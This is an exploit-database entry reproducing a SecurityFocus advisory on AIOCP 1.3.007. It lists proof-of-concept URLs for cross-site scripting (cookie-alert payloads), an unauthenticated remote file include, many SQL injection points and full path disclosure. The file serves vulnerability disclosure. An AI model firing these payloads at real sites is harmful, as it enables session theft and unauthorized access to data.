exploit-db-mirror/platforms/php/webapps/28935.txt
Offensive Security d5138d6962 DB: 2016-09-14
17 new exploits

Microsoft Windows Media Player 7.0 - '.wms' Arbitrary Script
Cherry Music 0.35.1 - Arbitrary File Disclosure
Battle.Net 1.5.0.7963 - Insecure File Permissions Privilege Escalation
Windows x86 - Password Protected TCP Bind Shell (637 bytes)
wdCalendar 2 - SQL Injection
Zapya Desktop 1.803 - (ZapyaService.exe) Privilege Escalation
Exper EWM-01 ADSL/MODEM - Unauthenticated DNS Change

Open-Xchange App Suite 7.8.2 - Cross Site Scripting

Open-Xchange Guard 2.4.2 - Multiple Cross Site Scripting

Multiple Icecream Apps - Insecure File Permissions Privilege Escalation

WinSMS 3.43 - Insecure File Permissions Privilege Escalation

Microsoft Internet Explorer 11.0.9600.18482 - Use After Free

AIOCP 1.3.x - 'cp_dpage.php' Full Path Disclosure
AIOCP 1.3.x - Multiple Vulnerabilities

ASUS DSL-X11 ADSL Router - Unauthenticated DNS Change

COMTREND ADSL Router CT-5367 C01_R12_ CT-5624 C01_R03 - Unauthenticated DNS Change

Tenda ADSL2/2+ Modem 963281TAN - Unauthenticated DNS Change

PLANET VDR-300NU ADSL Router - Unauthenticated DNS Change

PIKATEL 96338WS_ 96338L-2M-8M - Unauthenticated DNS Change

Inteno EG101R1 VoIP Router - Unauthenticated DNS Change
2016-09-14 05:08:39 +00:00

71 lines
3.9 KiB
Text
Executable file

source: http://www.securityfocus.com/bid/20931/info
All In One Control Panel (AIOCP) is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, access or modify sensitive data, execute arbitrary script code in the context of the application, compromise the application and possibly exploit latent vulnerabilities in the underlying system; other attacks are also possible.
AIOCP 1.3.007 and prior versions are vulnerable.
Cross-site scripting =
-
http://www.example.com/public/code/cp_forum_view.php?fmode=top&topid=</textarea>'"><script>alert(document.cookie)</script>
-
http://www.example.com/public/code/cp_forum_view.php?fmode=top&topid=53&forid=</textarea>'"><script>alert(document.cookie)</script>
-
http://www.example.com/public/code/cp_forum_view.php?fmode=top&topid=53&forid=23&catid=</textarea>'"><script>alert(document.cookie)</script>
-
http://www.example.com/public/code/cp_dpage.php?choosed_language=</textarea>'"><script>alert(document.cookie)</script>
-
http://www.example.com/public/code/cp_forum_view.php?fmode=top&topid=53&forid=</textarea>'"><script>alert(document.cookie)</script>
-
http://www.example.com/public/code/cp_forum_view.php?fmode=top&topid=53&forid=3&catid=</textarea>'"><script>alert(document.cookie)</script>
-
http://www.example.com/public/code/cp_show_ec_products.php?order_field=</textarea>'"><script>alert(document.cookie)</script>
-
http://www.example.com/public/code/cp_users_online.php?order_field=</textarea>'"><script>alert(document.cookie)</script>
-
http://www.example.com/public/code/cp_links_search.php?orderdir=</textarea>'"><script>alert(document.cookie)</script>
Remote File-Include =
/admin/code/index.php?load_page=http%3A//google.com
( no login needed for the remote file include )
SQL-Injection =
- http://www.example.com/public/code/cp_dpage.php?choosed_language=[sql]
- http://www.example.com/public/code/cp_news.php?choosed_language=[sql]
- http://www.example.com/public/code/cp_news.php?news_category=[sql]
-
http://www.example.com/public/code/cp_forum_view.php?choosed_language=[sql]
-
http://www.example.com/public/code/cp_edit_user.php?choosed_language=[sql]
-
http://www.example.com/public/code/cp_newsletter.php?nlmsg_nlcatid=[sql]
-
http://www.example.com/public/code/cp_newsletter.php?choosed_language=[sql]
- http://www.example.com/public/code/cp_links.php?links_category=[sql]
- http://www.example.com/public/code/cp_links.php?choosed_language=[sql]
-
http://www.example.com/public/code/cp_contact_us.php?choosed_language=[sql]
-
http://www.example.com/public/code/cp_show_ec_products.php?product_category_id=[sql]
-
http://www.example.com/public/code/cp_show_ec_products.php?product_category_id=[sql]
-
http://www.example.com/public/code/cp_show_ec_products.php?order_field=[sql]
- http://www.example.com/public/code/cp_login.php?choosed_language=[sql]
-
http://www.example.com/public/code/cp_users_online.php?order_field=cpsession_expiry&submitted=1&firstrow=[sql]
-
http://www.example.com/public/code/cp_codice_fiscale.php?choosed_language=[sql]
- http://www.example.com/public/code/cp_links_search.php?orderdir=[sql]
Full Path Disclosure =
-
http://www.example.com/public/code/cp_dpage.php?choosed_language=eng&aiocp_dp[]=_main
-
http://www.example.com/public/code/cp_show_ec_products.php?order_field[]=
- http://www.example.com/public/code/cp_show_page_help.php?hp[]=